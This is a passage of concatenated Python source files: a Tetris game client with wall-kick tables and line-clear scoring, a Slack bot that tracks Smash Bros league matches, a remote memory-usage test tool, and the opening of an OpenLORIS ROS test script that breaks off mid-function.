self._RefillPieces()
self._TakePieceFromList()
def Run(self):
auto_drop_th = threading.Thread(target=self.AutoDrop, name="auto_drop", daemon=True)
process_input_th = threading.Thread(target=self._ProcessActionsThread, daemon=True)
if not self.disable_autodrop:
auto_drop_th.start()
process_input_th.start()
if not self.disable_autodrop:
auto_drop_th.join()
process_input_th.join()
print("game ends")
def GetState(self) -> GameState:
"""Gets game state.
Returns the objects ref instead of copy For better performance.
"""
return copy.deepcopy(super())
def GetCell(self, i: int, j: int) -> int:
"""Gets cell at [i,j].
Notes: This function doesn't check the index out of boundary error.
"""
return self.color_map[i, j]
def GetMap(self):
"""Gets whole color_map."""
return self.color_map
def GetMapArea(self, corner: Tuple[int, int],
size: Tuple[int, int]) -> np.array:
"""Gets an area of
:param top_left:
:param bottom_right:
:return: The area of the color_map.
"""
size = (np.min([size[0], self.color_map.shape[0] - corner[0]]),
np.min([size[1], self.color_map.shape[1] - corner[1]]))
return self.color_map[corner[0]: corner[0] + size[0],
corner[1]: corner[1] + size[1]]
def SetMap(self, pos: Tuple[int, int], v: int, map: np.array = None):
"""Sets the cell at [i,j] to value v."""
(i, j) = pos
bit_map = self.bit_map.copy()
if map is None or map is self.color_map:
map = self.color_map
bit_map = self.bit_map
map[i, j] = v
# Set a bit to value: Clear to bit to 0 and then set to value
bit_v = 0 if v == 0 else 1
bit_j_pos = self.width + self.map_side_padding - 1 - j
bit_map[i] = (bit_map[i] & ~(1 << bit_j_pos)) | (bit_v << bit_j_pos)
def SetWholeMap(self, map: np.array):
if map.shape != self.color_map.shape:
raise InternalError(
f"Map shape {map.shape}"
f" must match the color_map shape: {self.color_map.shape}")
self.color_map = map
# Convert the map to Bollean map
bit_color_map = map != 0
# Revert the order and padding, then call the packbits(..., order="little") fn
bit_color_map = bit_color_map[:, ::-1]
bit_color_map = np.pad(
bit_color_map,
((0, 0), (self.map_side_padding, self.map_side_padding)),
"constant", constant_values=(1,))
padding0_len = self.dtype_length - bit_color_map.shape[1]
bit_color_map = np.pad(bit_color_map, ((0, 0), (0, padding0_len)),
"constant", constant_values=(0,))
int_color_map = np.packbits(bit_color_map, bitorder="little").view(self.dtype)
self.bit_map[0:self.map_height_padding + self.height] = int_color_map
print(int_color_map)
print(self.bit_map)
def copy(self):
another = copy.copy(self)
another.last_action = copy.copy(self.last_action)
if self.last_put_piece is not None:
another.last_put_piece = self.last_put_piece.copy()
another.color_map = np.copy(self.color_map)
another.bit_map = np.copy(self.bit_map)
another.action_list = copy.copy(self.action_list)
another.piece_list = self.piece_list.copy()
another.current_piece = self.current_piece.copy()
if self.held_piece is None:
another.held_piece = None
else:
another.held_piece = self.held_piece.copy()
return another
def AutoDrop(self):
while True:
if self.soft_drop:
# If it is soft dropping, we don't perform auto drop.
self.soft_drop = False
else:
if self.CheckValidity(self.current_piece, offset=(1, 0)):
self.Move(actions.Action(down=True, source_user_or_ai=False))
else:
if (not self._enable_lock_time or
self.accumulate_lock_time >= self.current_maximum_lock_time):
self.PutPiece()
else:
self.accumulate_lock_time += self._current_spawn_interval / 1000
time.sleep(self._current_spawn_interval / 1000)
def InputActions(self, acts: List[actions.Action]):
if self.is_gameover:
return
if len(acts) > 30:
print("len:", len(acts))
acts = acts[-30:]
for act in acts:
if self.action_list.qsize() > 50:
break
self.action_list.put(act)
def ProcessActions(self, actions: List[actions.Action], post_processing=True):
for a in actions:
self.ProcessAction(a, post_processing=post_processing)
def ProcessAction(self, action: actions.Action, post_processing=True):
if self.is_gameover:
return
# print(f"Processed action: {action.direction}, {action.rotation}, {action.swap}")
# self.test += 1
# print(self.test)
if action.swap:
self.Swap()
self.Rotate(action.rotation)
self.Move(action, post_processing=post_processing)
def _ProcessActionsThread(self):
while True:
while not self.action_list.empty():
act = self.action_list.get()
self.ProcessAction(act)
self.action_list.task_done()
time.sleep(0.001)
def SetLevel(self, level: int = 0):
"""Let the front end set!"""
self.level = level
i = min(len(self.interval_decrease), self.level)
self._current_spawn_interval = max(
10, self._init_spawn_interval - self.interval_decrease[i])
def IncreaseLevel(self, inc: int = 1):
"""Let the front end decide!"""
self.level += inc
self.SetLevel(self.level)
def Move(self, action: actions.Action, post_processing=True) -> bool:
"""Moves the current piece.
:param direction: Direction to move
:param post_processing: if True, put the piece to color_map and
apply line eliminate. Otherwise just update the current_piece's states.
:return True if moved; False otherwise
"""
if (action.direction == actions.NONE and
not action.down):
return False
moved = False
if action.down:
try:
self.mutex_current_piece.acquire()
if self.CheckValidity(self.current_piece, (1, 0)):
self.current_piece.x += 1
moved = True
self.soft_drop = True
finally:
self.mutex_current_piece.release()
if action.direction == actions.LEFT:
try:
self.mutex_current_piece.acquire()
if self.CheckValidity(self.current_piece, (0, -1)):
self.current_piece.y += -1
moved = True
finally:
self.mutex_current_piece.release()
if action.direction == actions.RIGHT:
try:
self.mutex_current_piece.acquire()
if self.CheckValidity(self.current_piece, (0, 1)):
self.current_piece.y += 1
moved = True
finally:
self.mutex_current_piece.release()
if action.direction == actions.HARD_DROP or action.direction == actions.SOFT_DROP:
try:
self.mutex_current_piece.acquire()
while self.CheckValidity(self.current_piece, (1, 0)):
self.current_piece.x += 1
moved = True
finally:
self.mutex_current_piece.release()
if post_processing and action.direction == actions.HARD_DROP:
self.PutPiece()
if moved:
self.last_action = action
at_bottom = not self.CheckValidity(self.current_piece, (1, 0))
if (at_bottom and action.direction != actions.HARD_DROP and
action.source_user):
self._RefreshLockTime()
return moved
def _RefreshLockTime(self):
self._enable_lock_time = True
if self.accumulate_lock_time >= self.current_maximum_lock_time:
self.current_maximum_lock_time = min(
self.current_maximum_lock_time + self.incremental_lock_time,
self.maximum_lock_time)
def _ResetLockTime(self):
self._enable_lock_time = False
self.accumulate_lock_time = 0
self.current_maximum_lock_time = 0
def Swap(self):
"""Swaps the held piece and the current if its swappable"""
if not self.can_swap:
return
try:
self.mutex_current_piece.acquire()
t = self.held_piece
self.held_piece = self.current_piece
self.current_piece = t
if not self.current_piece:
self._TakePieceFromList()
self.current_piece.Init()
self.held_piece.Init()
self.can_swap = False
finally:
self.mutex_current_piece.release()
def CheckGameOver(self):
self.is_gameover = np.any(
self.GetMapArea((0, 0), (self.map_height_padding, self.width)) != 0)
return self.is_gameover
def _AnalyzeElimination(self, n_eliminate: int) -> int:
ret = 0
is_last_put_t = isinstance(self.last_put_piece, shape.T)
if n_eliminate == 1:
if (is_last_put_t and self.last_action and self.last_action.rotation != 0):
print("TSS")
ret += TSS
self.line_tobesent += ATTACK_TSS
else:
ret += SINGLE
if n_eliminate == 2:
# TSD
if (is_last_put_t and self.last_action and self.last_action.rotation != 0):
print("TSD")
ret += TSD
self.line_tobesent += ATTACK_TSD
# Normal Double
else:
ret += DOUBLE
self.line_tobesent += ATTACK_DOUBLE
if n_eliminate == 3:
# TST
if (is_last_put_t and self.last_action and self.last_action.rotation != 0):
print("TST")
ret += TST
self.line_tobesent += ATTACK_TST
else:
ret += TRIPLE
self.line_tobesent += ATTACK_TRIPLE
if n_eliminate == 4:
ret += QUAD
self.line_tobesent += ATTACK_QUAD
# Checks for PC
if np.all(self.color_map == 0):
print("PC")
ret += PC
self.line_tobesent += ATTACK_PC
return ret * (self.level + 3)
def _LineClear(self):
elimated_lines = []
elimated_cnt = 0
# Checks the 4 lines... This is not adapt to shape with higher than 4 lines
# but that's not a part of this game. I don't have plan to support custom
# shapes.
for row in range(4):
if not (self.last_put_piece.x + row >= 0 and
self.last_put_piece.x + row < self.height + self.map_height_padding):
continue
if np.all(self.color_map[self.last_put_piece.x + row, :] != 0):
elimated_lines.append(row + self.last_put_piece.x)
elimated_cnt += 1
self.color_map = np.vstack((np.zeros((elimated_cnt, self.width),
dtype=self.dtype),
np.delete(self.color_map, elimated_lines, axis=0)))
# Updates the bit_map
side_padding = (1 << self.map_side_padding) - 1
init_row = (side_padding << (self.map_side_padding + self.width)) | side_padding
self.bit_map = np.concatenate((elimated_cnt * [init_row],
np.delete(self.bit_map, elimated_lines))).astype(self.dtype)
self.accumulated_lines_eliminated += elimated_cnt
self.score += self._AnalyzeElimination(n_eliminate=elimated_cnt)
def _SendAttack(self):
"""Send attack to target."""
# This feature has not been implemented yet.
self.line_sent += self.line_tobesent
self.line_tobesent = 0
def PutPiece(self, piece: shape.Shape = None):
""" Puts a piece to color_map if it is a valid placement then execute the post processing.
:param piece: The piece to put, if None, put the self.current_piece
:param color_map: The color_map where the piece puts, if None, self.color_map will be used.
:returns: True if the piece has been put. False otherwise.
"""
if self._PrePutPiece(piece):
self._PostPutPiece(piece)
return True
else:
return False
def _PrePutPiece(self, piece: shape.Shape = None, map: np.array = None):
""" Puts a piece to color_map if it is a valid placement.
Post put processing such as self._LineClear will not be executed
:param piece: The piece to put, if None, put the self.current_piece
:param map: The color_map where the piece puts, if None, self.color_map will be used.
:returns: True if the piece has been put. False otherwise.
"""
try:
if not piece:
self.mutex_current_piece.acquire()
piece = self.current_piece
if map is None:
map = self.color_map
if not self.CheckValidity(piece):
return False
for (i, j) in piece.GetShape():
self.SetMap((piece.x + i, piece.y + j), piece.id, map)
return True
finally:
if self.mutex_current_piece.locked():
self.mutex_current_piece.release()
def _PostPutPiece(self, piece: shape.Shape = None):
if piece is not None:
self.last_put_piece = piece
else:
self.last_put_piece = self.current_piece
# LineClear should be called prior to SendAttack
self._LineClear()
if piece is None:
self._TakePieceFromList()
self.CheckGameOver()
self._ResetLockTime()
self._SendAttack()
self.can_swap = True
self.piece_dropped += 1
def TextDraw(self):
preview_map = self.color_map.copy()
self._PrePutPiece(self.current_piece, preview_map)
for i in preview_map:
print(i)
print()
def SpawnPiece(self, piece: shape.Shape = None) -> bool:
if not piece:
self._TakePieceFromList()
else:
self.current_piece = piece.copy()
return self.CheckValidity(self.current_piece)
def _FindFittedPiece(self, piece: shape.Shape = None, num_90rotations: int = 0):
"""Finds a location that fits this piece with n 90rotations.
Ref: https://tetris.fandom.com/wiki/SRS
:param piece: The piece to be put in the color_map. If none, it will be set to the current_piece
:param num_90rotations: How many 90 rotations
:return: piece - shape.Shape: the piece with rotations that fits the color_map.
"""
if not piece:
piece = self.current_piece
def _IsJLSTZ(piece: shape.Shape):
jlstz = [shape.J, shape.L, shape.S, shape.T, shape.Z]
for s in jlstz:
if isinstance(piece, s):
return True
return False
# The 180 rotation wall kick table is copied from
# https://tetris.fandom.com/wiki/SRS#180.C2.B0_rotation
# which is origined from
# https://github.com/JoshuaWebb/nullpomino/blob/master/src/mu/nu/nullpo/game/subsystem/wallkick/StandardWallkick.java
offset_map_jlstz = [
# state 0
([(0, 0), (0, -1), (-1, -1), (2, 0), (2, -1)], # 0>>1
# 0>>2, 180 rotation
# [(0,0), (1, 0), (2, 0), (1, 1), (2, 1), (-1, 0), (-2, 0), (-1, 1), (-2, 1), (0, -1), (3, 0), (-3, 0)],
[(0, 0)],
[(0, 0), (0, 1), (-1, 1), (2, 0), (2, 1)]), # 0>>3
# state 1
([(0, 0), (0, 1), (1, 1), (-2, 0), (-2, 1)], # 1>>2
# l>>3, 180 rotation
# [(0,0), (0, 1), (0, 2), (-1, 1), (-1, 2), (0, -1), (0, -2), (-1, -1), (-1, -2), (1, 0), (0, 3), (0, -3)],
[(0, 0)],
[(0, 0), (0, 1), (1, 1), (-2, 0), (-2, 1)]), # 1>>0
# state 2
([(0, 0), (0, 1), (-1, 1), (2, 0), (2, 1)], # 2>>3
# [(0,0), (-1, 0), (-2, 0), (-1, -1), (-2, -1), (1, 0), (2, 0), (1, -1), (2, -1), (0, 1), (-3, 0), (3, 0)], # 2>>0,
[(0, 0)],
[(0, 0), (0, -1), (-1, -1), (2, 0), (2, -1)]), # 2>>1
# state 3
([(0, 0), (0, -1), (1, -1), (2, 0), (-2, -1)], # 3>>0
# 3>>1, 180 rotation
# [(0,0), (0, 1), (0, 2), (1, 1), (1, 2), (0, -1), (0, -2), (1, -1), (1, -2), (-1, 0), (0, 3), (0, -3)],
[(0, 0)],
[(0, 0), (0, -1), (1, -1), (2, 0), (-2, -1)]), # 3>>2
]
offset_map_i = [
# state 0
[[(0, 0), (0, -2), (0, 1), (1, -2), (-2, 1), ], # 0>>1
# [(0,0), (-1, 0), (-2, 0), (1, 0), (2, 0), (0, 1)], # 0>>2, 180 rotation
[(0, 0)],
[(0, 0), (0, -1), (0, 2), (-2, -1), (1, 2)]], # 0>>3
# state 1
[[(0, 0), (0, -1), (0, 2), (-2, -1), (1, 2)], # 1>>2
# [(0,0), (0, 1), (0, 2), (0, -1), (0, -2), (-1, 0)], # 1>>3, 180 rotation,
[(0, 0)],
[(0, 0), (0, 2), (0, -1), (-1, 2), (2, -1)]], # 1>>0
# state 2
[[(0, 0), (0, 2), (0, -1), (-1, 2), (2, -1)], # 2>>3
# [(0, 0), (1, 0), (2, 0), (-1, 0), (-2, 0), (0, -1)], # 2>>0, 180 rotation
[(0, 0)],
[(0, 0), (0, 1), (0, -2), (2, 1), (-1, -2)]], # 2>>1
# state 3
[[(0, 0), (0, 1), (0, -2), (2, 1), (-1, -2)], # 3>>0
# [(0, 0), (0, 1), (0, 2), (0, -1), (0, -2), (1, 0)], # 3>>1, 180 rotation
[(0, 0)],
[(0, 0), (0, -2), (0, 1), (1, -2), (2, 1)]], # 3>>2
]
state = piece.state
num_90rotations %= 4
offset_piece = piece.copy()
ori_x = offset_piece.x
ori_y = offset_piece.y
for _ in range(num_90rotations):
offset_piece.Rotate90()
if num_90rotations == 0:
if self.CheckValidity(offset_piece):
return offset_piece
num_90rotations -= 1
if _IsJLSTZ(piece):
for (offset_x, offset_y) in offset_map_jlstz[state][num_90rotations]:
offset_piece.x = ori_x + offset_x
offset_piece.y = ori_y + offset_y
if (offset_piece.y >= self.width or
offset_piece.x >= self.height + self.map_height_padding):
continue
if self.CheckValidity(offset_piece):
return offset_piece
else:
for (offset_x, offset_y) in offset_map_i[state][num_90rotations]:
offset_piece.x = ori_x + offset_x
offset_piece.y = ori_y + offset_y
if (offset_piece.y >= self.width or
offset_piece.x >= self.height + self.map_height_padding):
continue
if self.CheckValidity(offset_piece):
return offset_piece
return None
def Rotate(self, n: int) -> bool:
"""Rotates the current piece.
:param n: rotations, in range [0,4)
:return: True if the current piece can be rotated. False otherwise.
"""
n %= 4
if n == 0:
return False
fitted_piece = self._FindFittedPiece(num_90rotations=n)
if fitted_piece:
self.current_piece = fitted_piece
self.last_action = actions.Action(dir=0, rotation=n)
if not self.CheckValidity(self.current_piece, (1, 0)):
self._RefreshLockTime()
return fitted_piece is not None
def CheckValidity(self, piece: shape.Shape, offset: Tuple[int, int] = (0, 0)):
"""Checks if the piece with offset can be put in the color_map
:param piece: The piece to be put.
:param offset: The inital offset to the piece
:return: True if the current state can fit into the color_map. False otherwise.
"""
(ox, oy, os) = (piece.x, piece.y, piece.state)
piece.x += offset[0]
piece.y += offset[1]
a = self.bit_map[piece.x: piece.x + 4]
b = self.width - piece.y
c = piece.GetBitMap().astype(self.dtype)
d = c << b
e = a & d
check_rst = e == 0
(piece.x, piece.y, piece.state) = (ox, oy, os)
return np.all(check_rst)
def _GetNextBag(self):
start_y = int((self.width - 3) / 2)
assert start_y >= 0
bag = [shape.I(start_y=start_y),
shape.J(start_y=start_y),
shape.L(start_y=start_y),
shape.O(start_y=start_y),
shape.S(start_y=start_y),
shape.T(start_y=start_y),
shape.Z(start_y=start_y)]
np.random.shuffle(bag)
return bag
def _RefillPieces(self):
"""
When there are less than REFILL_THRESHOLD pieces in the list,
refill it with a new bag.
"""
if len(self.piece_list) <= REFILL_THRESHOLD:
self.piece_list.extend(self._GetNextBag())
def _TakePieceFromList(self):
self._RefillPieces()
self.current_piece = self.piece_list[0].copy()
self.piece_list = self.piece_list[1:]
def CreateGameFromState(state: GameState) -> GameClient:
game = GameClient(height=state.height, width=state.width)
game.color_map = np.copy(state.color_map)
game.current_piece = state.current_piece.copy()
if state.held_piece is not None:
game.held_piece = state.held_piece.copy()
else:
game.held_piece = None
game.score = state.score
game.piece_list = state.piece_list.copy()
game.can_swap = state.can_swap
game.is_gameover = state.is_gameover
game.accumulated_lines_eliminated = state.accumulated_lines_eliminated
game.piece_dropped = state.piece_dropped
game.line_sent = state.line_sent
game.line_received = state.line_received
return game
|
smashbot.py
|
import os, sys
sys.path.append(os.path.dirname(__file__))
from slackclient import SlackClient
import bot_config
import db
import collections
from match_making import gather_scores, get_player_name
import time
from websocket import WebSocketConnectionClosedException
from multiprocessing import Process
from datetime import datetime
import logging, sys
class SmashBot():
def __init__(self):
self.slack_client = SlackClient(bot_config.get_slack_api_key())
self.logger = logging.getLogger('smashbot')
hdlr = logging.FileHandler(bot_config.get_log_path())
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
self.logger.addHandler(hdlr)
self.logger.setLevel(logging.DEBUG)
self.logger.debug('booting up smashbot file')
def keepalive(self):
while True:
time.sleep(3)
try:
self.slack_client.server.ping()
except WebSocketConnectionClosedException as e:
self.logger.debug('Keep alive web socket exception.')
self.slack_client.rtm_connect()
def print_help(self, channel):
message = 'I support the following:'
message = message + '\n`@sul me over @them 3-2` or `@sul @them over me 3-2` - report a score'
message = message + '\n`@sul group a` - see the current rankings of a group'
# message = message + '\n`@sul leaderboard` - see the leaderboard, sorted by winrate'
# message = message + '\n`@sul loserboard` - see the loserboard, sorted by winrate'
message = message + '\n`@sul who do i play` - see who you play this week (only in dms)'
message = message + '\n`@sul matches for week` - see all matches occuring this week in all groups'
# message = message + '\n`@sul my total stats` - see your total wins and losses (both games and sets)'
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
### TODO Refactor so it can support Bo3 AND Bo5 across the database
def get_leaderboard(self, reverse_order=True):
matches = db.get_matches()
players = db.get_players()
player_dict = dict()
for player in players:
player_dict[player.slack_id] = {
'games_won': 0,
'games_total': 0,
'name': player.name
}
for match in matches:
games_played = match.sets
player_1 = player_dict[match.player_1_id]
player_2 = player_dict[match.player_2_id]
player_dict[match.player_1_id]['games_total'] = player_1['games_total'] + games_played
player_dict[match.player_2_id]['games_total'] = player_2['games_total'] + games_played
if match.player_1_id == match.winner_id:
player_dict[match.player_1_id]['games_won'] = player_1['games_won'] + 2
if games_played == 3:
player_dict[match.player_2_id]['games_won'] = player_2['games_won'] + 1
elif match.player_2_id == match.winner_id:
player_dict[match.player_2_id]['games_won'] = player_2['games_won'] + 2
if games_played == 3:
player_dict[match.player_1_id]['games_won'] = player_1['games_won'] + 1
winrate_dict = dict()
for player_id, player in player_dict.items():
if player['games_total'] == 0:
winrate_dict[player['name']] = {
'games_won': 0,
'games_lost': 0,
'winrate': round(0, 2)
}
else:
winrate_dict[player['name']] = {
'games_won': player['games_won'],
'games_lost': player['games_total'] - player['games_won'],
'winrate': round((player['games_won'] / player['games_total']) * 100, 2)
}
sorted_winrates = collections.OrderedDict(sorted(winrate_dict.items(), key=lambda x: x[1]['winrate'], reverse=reverse_order))
return sorted_winrates
### TODO Refactor so it can support Bo3 AND Bo5 across the database
def print_leaderboard(self, channel):
sorted_winrates = self.get_leaderboard()
message = ""
for player_name in list(sorted_winrates)[:10]:
player_object = sorted_winrates[player_name]
message = message + f"\n {player_name}: {player_object['winrate']}% ({player_object['games_won']}-{player_object['games_lost']})"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
### TODO Refactor so it can support Bo3 AND Bo5 across the database
def print_loserboard(self, channel):
sorted_winrates = self.get_leaderboard(False)
message = ""
for player_name in list(sorted_winrates)[:10]:
player_object = sorted_winrates[player_name]
message = message + f"\n {player_name}: {player_object['winrate']}% ({player_object['games_won']}-{player_object['games_lost']})"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
def print_whole_week(self, channel, date):
all_weekly_matches = db.get_matches_for_week(date)
players = db.get_players()
message = ""
for match in all_weekly_matches:
message = message + f"\n {get_player_name(players, match.player_1_id)} vs. {get_player_name(players, match.player_2_id)} : week: {match.week}"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
def print_user_week(self, user_id, channel, date):
all_weekly_matches = db.get_matches_for_week(date)
players = db.get_players()
user_match_dict = dict()
for match in all_weekly_matches:
if match.player_1_id == user_id:
user_match_dict[get_player_name(players, match.player_2_id)] = match.week
elif match.player_2_id == user_id:
user_match_dict[get_player_name(players, match.player_1_id)] = match.week
message = ""
for player, week in user_match_dict.items():
message = message + f"\n Playing: {player} | week: {week}"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
### TODO Refactor so it can support Bo3 AND Bo5 across the database
def print_user_stats(self, user_id, channel):
all_matches = db.get_matches()
total_won_matches = 0
total_lost_matches = 0
total_won_sets = 0
total_lost_sets = 0
for match in all_matches:
if match.winner_id is None:
continue
elif user_id == match.winner_id:
total_won_matches += 1
total_won_sets += 2
if match.sets == 3:
total_lost_sets += 1
elif (match.player_1_id == user_id or match.player_2_id == user_id) and user_id != match.winner_id:
total_lost_matches += 1
total_lost_sets += 2
if match.sets == 3:
total_won_sets += 1
message = f"\n Matches Won: {total_won_matches} | Matches Lost: {total_lost_matches} | Sets Won: {total_won_sets} | Sets Lost: {total_lost_sets}"
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
def print_group(self, channel, group):
try:
season = db.get_current_season()
all_matches = db.get_matches_for_season(season)
all_players = db.get_players()
group_matches = [m for m in all_matches if m.grouping.lower() == group.lower()]
if not len(group_matches):
raise Exception('Not a match')
players = gather_scores(group_matches)
message = 'Group ' + group.upper() + ':'
for p in players:
message += '\n' + get_player_name(all_players, p['player_id']) + ' ' + str(p['m_w']) + '-' + str(p['m_l'])
message += ' ('+str(p['s_w'])+'-'+str(p['s_l'])+')'
self.slack_client.api_call("chat.postMessage", channel=channel, text=message, as_user=True)
except Exception as e:
self.logger.debug(e)
self.slack_client.api_call("chat.postMessage", channel=channel, text="Not a group (or I messed up).", as_user=True)
def parse_first_slack_id(self, message):
return message[message.index('<@') + 2 : message.index('>')].upper()
def parse_second_slack_id(self, message):
message = message[message.index('>') + 1:]
return self.parse_first_slack_id(message)
def parse_score(self, message):
dash_index = message.index('-')
score_substring = message[dash_index - 1 : dash_index + 2]
if score_substring != "3-0" and score_substring != "3-1" and score_substring != "3-2":
raise Exception("Malformed score")
score_1 = int(score_substring[0])
score_2 = int(score_substring[2])
return score_1, score_2
def parse_message(self, command, poster):
isAdmin = poster == bot_config.get_commissioner_slack_id()
if command.startswith('me over '):
winner = poster
loser = self.parse_first_slack_id(command)
elif command.startswith('<@') and command.index('over me') > 0:
winner = self.parse_first_slack_id(command)
loser = poster
elif isAdmin and command.startswith('<@'):
winner = self.parse_first_slack_id(command)
loser = self.parse_second_slack_id(command)
else:
self.logger.debug('Bad message format')
return None
if winner == loser:
self.logger.debug('Cant play against yourself')
return None
try:
score_1, score_2 = self.parse_score(command)
except Exception as e:
self.logger.debug('Malformed score', e)
return None
return {
'winner_id': winner,
'loser_id': loser,
'score_total': (score_1 + score_2)
}
def enter_score(self, winner_id, loser_id, score_total, channel, timestamp):
try:
if not db.update_match_by_id(winner_id, loser_id, score_total):
self.slack_client.api_call("chat.postMessage", channel=channel, text='Not a match I have (or I messed up).', as_user=True)
self.slack_client.api_call("reactions.add", name="x", channel=channel, timestamp=timestamp)
return
self.slack_client.api_call("chat.postMessage", channel=bot_config.get_commissioner_slack_id(), text='Entered into db', as_user=True)
self.slack_client.api_call("reactions.add", name="white_check_mark", channel=channel, timestamp=timestamp)
except Exception as e:
self.slack_client.api_call("chat.postMessage", channel=bot_config.get_commissioner_slack_id(), text='Failed to enter into db', as_user=True)
self.slack_client.api_call("reactions.add", name="x", channel=channel, timestamp=timestamp)
self.logger.error(e)
def filter_invalid_messages(self, message_list):
valid_messages = []
for message_object in message_list:
if message_object is None:
continue
if 'text' not in message_object or 'channel' not in message_object or 'user' not in message_object or 'ts' not in message_object:
continue
if 'bot_id' in message_object:
continue
message_text = message_object['text']
if message_object['channel'][:1] == 'D':
if message_text.startswith('<@' + bot_config.get_bot_slack_user_id() + '>'):
message_text = message_text[message_text.index(">") + 1:].strip()
message_object['text'] = message_text
valid_messages.append(message_object)
continue
if message_object['channel'] == bot_config.get_channel_slack_id() and message_text.startswith('<@' + bot_config.get_bot_slack_user_id() + '>'):
message_text = message_text[message_text.index(">") + 1:].strip()
message_object['text'] = message_text
valid_messages.append(message_object)
continue
return valid_messages
def handle_message(self, message_object):
command = message_object["text"]
channel = message_object["channel"]
user_id = message_object["user"]
timestamp = float(message_object["ts"])
user_date = datetime.fromtimestamp(timestamp).date()
""""
if command == 'leaderboard':
self.print_leaderboard(channel)
elif command == 'loserboard' or command == 'troy':
self.print_loserboard(channel)
elif command == 'my total stats' and channel[:1] == 'D':
self.print_user_stats(user_id, channel)
"""
if command == 'matches for week':
self.print_whole_week(channel, user_date)
elif command == 'who do i play' and channel[:1] == 'D':
self.print_user_week(user_id, channel, user_date)
elif command == 'help':
self.print_help(channel)
elif command.startswith('group'):
self.print_group(channel, command[6])
else:
result = None
try:
result = self.parse_message(command, user_id)
except Exception as e:
self.logger.debug(e)
if result is None:
format_msg = "Didn't catch that. The format is `@sul me over @them 3-2` or `@sul @them over me 3-2`."
self.slack_client.api_call("chat.postMessage", channel=channel, text=format_msg, as_user=True)
elif result is not None and channel[:1] == 'D':
format_msg = "Nice try, you have to put this in the main channel"
self.slack_client.api_call('chat.postMessage', channel=channel, text=format_msg, as_user=True)
elif result is not None and channel == bot_config.get_channel_slack_id():
self.enter_score(result['winner_id'], result['loser_id'], result['score_total'], channel, message_object["ts"])
player = db.get_player_by_id(result['winner_id'])
self.print_group(channel, player.grouping)
return None
def start_bot(self):
p = Process(target=self.keepalive)
p.start()
if self.slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
try:
message_list = self.slack_client.rtm_read()
message_list = self.filter_invalid_messages(message_list)
for message in message_list:
try:
self.handle_message(message)
except Exception as e:
self.logger.debug(e)
self.slack_client.api_call("reactions.add", name="x", channel=message["channel"], timestamp=message["ts"])
time.sleep(1)
except Exception as e:
self.logger.debug('Main while loop web socket exception.', e)
self.slack_client.rtm_connect()
else:
print("Connection failed. Invalid Slack token or bot ID?")
if __name__ == "__main__":
SmashBot().start_bot()
|
memuse.py
|
#!/usr/bin/python
import sys
sys.path.insert(0, './src')
import argparse
import threading, time
from target_machine import *
from target_xml import *
from thread_input import *
thread_args = []
def menu():
parser = argparse.ArgumentParser(description='memuse for Ostro')
parser.add_argument('--ip', '-i', nargs=1)
parser.add_argument('--port', '-p', nargs=1, type=int)
parser.add_argument('--user', '-u', nargs=1, default='root')
parser.add_argument('--password', '-w', nargs=1, default='iotos')
parser.add_argument('--load', '-l', nargs=1)
parser.add_argument('--output', '-o', nargs=1, default='./outputs')
parser.add_argument('--process', '-s', nargs=1)
args = parser.parse_args()
return args
def analyze_process(ti):
tm = TargetMachine(ti.ip, ti.port, ti.user, ti.password)
print ti.ip
dst = '/tmp/' + ti.ip
src = '/tmp/proc/'
pname = ti.process
tm.analyze_memstat(src, dst, ti.output, pname)
def test_target(ti):
tm = TargetMachine(ti.ip, ti.port, ti.user, ti.password)
print ti.ip
dst = '/tmp/' + ti.ip
src = '/tmp/proc/'
tm.analyze_memstat(src, dst, ti.output, ti.process)
if __name__ == '__main__':
#err = 0
args = menu()
#print args.ip[0], args.port[0], args.user, args.password, args.load, args.output
threads = []
ti = ThreadInput()
#Functional options.
if args.process != None:
ti.process = args.process[0]
else:
ti.process = ''
if args.load == None:
#ti = ThreadInput(args.ip[0], args.port[0], args.user, args.password, args.output)
#thread_args.append(ti)
#index = thread_args.
ti.set_machine(args.ip[0], args.port[0], args.user, args.password, args.output)
arglist = []
arglist.append(ti)
thread = threading.Thread(target=test_target, args=arglist)
threads.append(thread)
else:
config = args.load[0]
print config
if os.path.exists(config) == False:
print 'Invalid target config file.'
#err = -1
else:
inputs = parse_target_xml(config)
for i in inputs:
i.outputs = args.output
print i._myself()
arglist = []
arglist.append(i)
thread = threading.Thread(target=test_target, args=arglist)
threads.append(thread)
for t in threads:
t.start()
for t in threads:
threading.Thread.join(t)
print 'All of the jobs have completed.'
|
openloris_test_ros.py
|
#!/usr/bin/env python
# Copyright (C) <2019-2021> Intel Corporation
# SPDX-License-Identifier: MIT
# Authors: Siyuan Lu; Xuesong Shi
from __future__ import print_function
import argparse
from collections import OrderedDict
import glob
import logging
import psutil
#import rosbag
import rospy
import sys
import time
import threading
import subprocess
import yaml
import signal
import os
from geometry_msgs.msg import PoseStamped
from std_msgs.msg import UInt8
from std_msgs.msg import String
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
#formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
formatter = logging.Formatter('%(message)s')
ch = logging.StreamHandler()
ch.setFormatter(formatter)
logger.addHandler(ch)
init_pose_topic = '/openloris/reset_pose'
valid_frames = ['d400_color', 'd400_depth', 'd400_imu', 't265_fisheye1', 't265_fisheye2', 't265_imu', 'base_link']
global pose_count
global current_pose
def pose_callback(data):
#logger.info(data)
print("%d.%d %s %f %f %f %f %f %f %f"
% (data.header.stamp.secs, data.header.stamp.nsecs,
rospy.get_time(),
data.pose.position.x,
data.pose.position.y,
data.pose.position.z,
data.pose.orientation.x,
data.pose.orientation.y,
data.pose.orientation.z,
data.pose.orientation.w)
)
global pose_count, current_pose
pose_count += 1
current_pose = (data.pose.position.x,
data.pose.position.y,
data.pose.position.z,
data.pose.orientation.x,
data.pose.orientation.y,
data.pose.orientation.z,
data.pose.orientation.w)
def handle_listener(topic):
rospy.Subscriber(topic, PoseStamped, pose_callback)
rospy.spin()
def sigint_handler(sig, frame):
print('# interrupted by user')
sys.exit('\nExit testing...\n')
def play_sequences(bags, topics, aided_reloc, scene, frame, pub_pose):
